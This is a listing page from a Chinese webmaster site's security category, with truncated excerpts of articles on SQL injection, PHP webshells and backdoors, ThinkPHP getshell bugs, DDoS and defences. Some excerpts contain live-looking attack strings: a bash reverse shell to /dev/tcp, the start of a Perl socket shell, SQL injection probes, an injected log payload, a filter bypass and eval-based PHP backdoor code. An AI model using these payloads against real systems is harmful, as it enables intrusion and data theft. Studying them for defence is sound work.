17站长网

17站长网 首页 安全脚本攻防
  • 网站后台数据库被黑客攻击了怎么办
  • 网站后台数据库被黑客攻击了怎么办
  • 网站后台被黑客攻击了怎么办,最近接到一个客户的诉求反映说网站被攻击了后台数据总是被篡改和泄露,而且维持这个状况已经很长时间了...
  • 时间: 2022-10-10 19:12
  • thinkphp代码执行getshell的漏洞解决
  • thinkphp代码执行getshell的漏洞解决
  • 先来简单说说前天thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell 影响的范围: 5.x < 5.1.31, <= 5.0.23 漏洞危害: 导致系统被提权(你懂的) 这里附上一个自己测试的
  • 时间: 2022-9-27 10:03
  • Linux 下多种编程语言的反弹 shell 方法
  • bash命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl版本:perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton(
  • 时间: 2022-9-27 10:03
  • ASP+PHP 标准sql注入语句(完整版)
  • 1.判断有无注入点 '  ;   and 1=1    and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0<>(select count(*) from *) and 0<>(select co
  • 时间: 2022-9-27 10:02
  • 一句话木马后门在防注入中的重生
  • 对于目前流行的sql注入,程序员在编写程序时,都普遍的加入防注入程序,有些防注入程序只要在我们提交一些非法的参数后,就会自动的记录下你的IP地址,提交的非法参数和动作等,同时也把非法提交的数据写入了系统的后缀为A
  • 时间: 2022-9-27 10:02
  • 使用爬虫采集网站时,解决被封IP的几种方法
  • 方法1.之前由于公司项目需要,采集过google地图数据,还有一些大型网站数据。经验如下:1.IP必须需要,像@alswl 说的非常正确,ADSL。如果有条件,其实可以跟机房多申请外网IP。2.在有外网IP的机器上,部署代理服务
  • 时间: 2022-9-27 09:23
  • 浅谈史上最大DDoS攻击的本质与防范
  • 浅谈史上最大DDoS攻击的本质与防范
  • ddos攻击的意思是指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,最后可以成倍地提高拒绝服务攻击的威力。 DDos攻击在今天看来并不新鲜,近两年来发展态势也渐趋平缓
  • 时间: 2022-9-27 09:23
  • SQL注入攻击(攻击与防范)
  • SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对
  • 时间: 2022-9-27 08:57
  • 分享PHP场景中getshell防御思路
  • 分享PHP场景中getshell防御思路
  • 1 背景概述 WEB应用漏洞导致的入侵时有发生,扫描器和WAF并不能解决所有的问题,于是尝试在主机侧针对PHP环境做了一个防御方案。很荣幸的邀请到TSRC部分白帽子做了一次对抗演习,本文主要分享一下防御思路。 防御
  • 时间: 2022-9-27 08:54
  • Linux系统采用netstat命令查看DDOS攻击的方法
  • Linux系统用netstat命令查看DDOS攻击具体命令用法如下: 代码如下:netstat -na 显示所有连接到服务器的活跃的网络连接 代码如下:netstat -an | grep :80 | sort 只显示连接到80段口的活跃的网络连接,80是http端
  • 时间: 2022-9-27 08:54
  • 记一次发现利用preg_replace隐藏后门和后续探究
  • 事情是这样的,朋友的网站的利用各种查找后门的工具都没有发现php木马。老是找不到,小黑的伎俩很高级,每次使用完毕总是把后门删掉,但是每次都能继续进来,总是找不到从哪进来的。这个着实让人蛋疼。 后来,
  • 时间: 2022-9-27 08:54
  • Mysql语法绕过360scan insert防注入方法
  • Mysql语法绕过360scan insert防注入方法
  • 360scan正则:INSERT\\s+INTO.+?VALUES 其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx = 提交: http://localhost/360.php?sql=insert into user (user,pass) values ('ad
  • 时间: 2022-9-27 08:52
  • 一些常见的PHP后门原理分析
  • 一些常见的PHP后门原理分析
  • 本地测试结果如下图。 本程序只作为学习作用,请勿拿去做坏事。代码如下: //1.php header('Content-type:text/html;charset=utf-8'); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10' && count(
  • 时间: 2022-9-27 08:52
  • PHP的一个EVAL的利用防范
  • 前段时间一个程序出的问题。就和这差不多。 代码如下:$code="${${eval($_GET[c])}}";?> 对于上面的代码。如果在URL提交http://www.phpeval.cn/test.php?c=phpinfo(); 就可以发现phpinfo()被执行了。而相应的提
  • 时间: 2022-9-27 08:51
  • PHP脚本木马的高级防范经验
  • 1、首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如你的 web目录是/usr/local/apache/htdocs,那么在httpd.conf里加上这么几行: php_admin_val
  • 时间: 2022-9-27 08:51
  • 六种后台拿shell的方法
  • 一、直接上传获得 这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文 件url应该是/imsges/smiles下,以前的联众游戏站和网易的
  • 时间: 2022-9-27 08:50
  • 安全防护 脚本攻击防范策略完全篇
  • 网络上的SQL Injection 漏洞利用攻击,JS脚本,HTML脚本攻击似乎逾演逾烈。陆续的很多站点都被此类攻击所困扰,并非像主机漏洞那样可以当即修复,来自于WEB的攻击方式使我们在防范或者是修复上都带来了很大的不便。
  • 时间: 2022-9-27 08:50
  • phpddos流量攻击预防方法
  • 这类攻击有一个最大的特性,就是上传流量霎时增大,通常流量高达数十以至近百M,将整台效 劳器,以至将整台机柜的宽带堵住,使网站无法运转,而这样的攻击,我们无法从远程处理,一但那个phpshell运转,你的宽带将被
  • 时间: 2022-9-27 08:48
  • PHP一句话Webshell变形总结
  • 0×00 前言 大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不足之前还请看官拍砖
  • 时间: 2022-9-27 08:48
  • PHP木马大全 一句话的PHP木马的防范
  • php后门木马常用的函数大致上可分为四种类型: 1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open 2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress
  • 时间: 2022-9-27 08:47
  • 一次奇遇的渗透
  • 一次奇遇的渗透
  • 作者:y0umer   打开网站发现   习惯的加了一个引号   确定是注入以后直接丢啊D了。(我懒)   这不悲剧了么,猜不出表段??   扫扫目录看看。   发现del.asp打开看看。。   错误提示的
  • 时间: 2022-9-27 08:44
  • Oracle的使用技巧以及脚本代码
  •  1. 如何查看ORACLE的隐含参数?   ORACLE的显式参数,除了在INIT.ORA文件中定义的外,在svrmgrl中用"show parameter *",可以显示。但ORACLE还有一些参数是以“_”,开头的。如我们非常熟悉的“_offline_rollback
  • 时间: 2022-9-27 08:43
  • 如何检测SQL注入技术以及跨站脚本攻击
  • 在最近两年中,安全专家应该对网络应用层的攻击更加重视。因为无论你有多强壮的防火墙规则设置或者非常勤于补漏的修补机制,如果你的网络应用程序开发者没有遵循 安全代码进行开发,攻击者将通过80端口进入你的系统
  • 时间: 2022-9-27 08:43
  • php后门木马常用命令分析与防范
  • php后门木马常用的函数大致上可分为四种类型:1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open2. 代码执行与加密: eval, assert, call_ ...
  • 时间: 2022-9-27 08:41
  • ThinkPHP framework 任意代码执行漏洞预警
  • ThinkPHP是一个国内使用很广泛的老牌PHP MVC框架。貌似国内有不少创业公司或者项目都用了这个框架。 最近官方发布了一个安全补丁,官方表述是:该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。 可是貌似大
  • 时间: 2022-9-27 08:38
  • web页面 一些sql注入语句小结
  • 选中 操作页面 提交数据 IP/日期 方式 /zz_article/articleshow.asp articleid=297 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124)=1 124.237.26.212 2007-11-14 SQL注入(GET)
  • 时间: 2022-9-27 08:38
  • php intval()函数使用不当的安全漏洞分析
  • 一、描述 intval函数有个特性:"直到遇上数字或正负符号才开始做转换,再遇到非数字或字符串结束时(\0)结束转换",在某些应用程序里由于对intval函数这个特性认识不够,错误的使用导致绕过一些安全判断导致安全漏洞.二
  • 时间: 2022-9-27 08:37
  • 分享一个不错的iptables脚本
  • 代码如下: 代码如下: #!/bin/sh # modprobe ipt_MASQUERADE modprobe ip_conntrack_ftp modprobe ip_nat_ftp iptables -F iptables -t nat -F iptables -X iptables -t nat -X ###########################INPUT键#
  • 时间: 2022-9-27 08:36
12下一页

热门排行

    最近更新

      返回顶部